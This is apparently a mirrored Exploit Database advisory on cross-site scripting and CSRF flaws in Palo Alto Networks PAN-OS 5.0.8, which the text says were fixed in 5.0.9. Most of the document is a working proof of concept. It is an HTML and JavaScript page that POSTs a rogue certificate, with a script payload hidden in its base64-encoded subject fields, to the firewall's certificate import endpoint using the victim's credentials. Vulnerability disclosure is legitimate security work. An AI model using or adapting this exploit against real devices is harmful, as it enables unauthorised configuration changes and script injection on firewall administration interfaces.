Palo Alto Networks Pan-OS 5.0.8 – Multiple Vulnerabilities

• Exploit Database
• 114 阅读

• 作者： Thomas Pollet
  日期： 2013-11-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29861/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121

  from http://thomaspollet.blogspot.be/2013/11/Palo-Alto-XSS.html :   A couple of bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks.   - Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject html into the web interface. - Various file upload forms used by the firewall do not implement proper CSRF protection. import.certificate.php for example.   <http://1.bp.blogspot.com/-eX46K2I1S7w/Uo93fo02D4I/AAAAAAAAAgM/QLjdd7QY3UM/s1600/Capture.PNG>     These issues have been fixed in PANOS 5.0.9 .   Example html source code to CSRF POST a rogue cert :       1. PA: <input type="text" id="url" value="https://10.10.10.22"> 2. <input type=button onclick="upload()" value="Upload Certificate"/> 3. <hr> 4. <textarea rows=80 cols=80 id=text> 5. 6. ----------------------------- 7. Content-Disposition: form-data; name="ext-comp-2304" 8. 9. on 10. ----------------------------- 11. Content-Disposition: form-data; name="certFile"; filename="server.crt" 12. Content-Type: application/octet-stream 13. 14. -----BEGIN CERTIFICATE----- 15. MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY 16. WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg 17. Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w 18. YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV 19. BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0 20. KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0 21. IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g 22. mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY 23. 5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu 24. gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB 25. AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE 26. eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2 27. FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t 28. -----END CERTIFICATE----- 29. 30. ----------------------------- 31. Content-Disposition: form-data; name="ext-comp-2306" 32. 33. Base64 Encoded Certificate (PEM) 34. ----------------------------- 35. Content-Disposition: form-data; name="keyFile"; filename="" 36. Content-Type: application/octet-stream 37. 38. 39. ----------------------------- 40. Content-Disposition: form-data; name="bImportCertificateSubmit" 41. 42. OK 43. ----------------------------- 44. Content-Disposition: form-data; name="certFileC" 45. 46. server.crt 47. ----------------------------- 48. Content-Disposition: form-data; name="vsysC" 49. 50. shared 51. ----------------------------- 52. Content-Disposition: form-data; name="passPhrase" 53. 54. 55. ----------------------------- 56. Content-Disposition: form-data; name="keyFileC" 57. 58. 59. ----------------------------- 60. Content-Disposition: form-data; name="certName" 61. 62. TPOLLET 63. ----------------------------- 64. Content-Disposition: form-data; name="format" 65. 66. pem 67. ----------------------------- 68. Content-Disposition: form-data; name="includekey" 69. 70. 71. ----------------------------- 72. Content-Disposition: form-data; name="certType" 73. 74. device 75. ----------------------------- 76. Content-Disposition: form-data; name="template" 77. 78. 79. ------------------------------- 80. &lt;/textarea&gt; 81. 82. <script> 83. function upload() { 84. text = document.getElementById(&apos;text&apos;).value 85. host = document.getElementById(&apos;url&apos;).value; 86. url= host + "/php/device/import.certificate.php"; 87. xhr= new XMLHttpRequest(); 88. xhr.withCredentials = true; 89. xhr.open("POST", url, true); 90. xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------"); 91. xhr.send(text); 92. alert(&apos;check &apos; + host + &apos;/#device::vsys1::device/certificate-management/certificates&apos; ); 93. } 94. 95. </script> 96.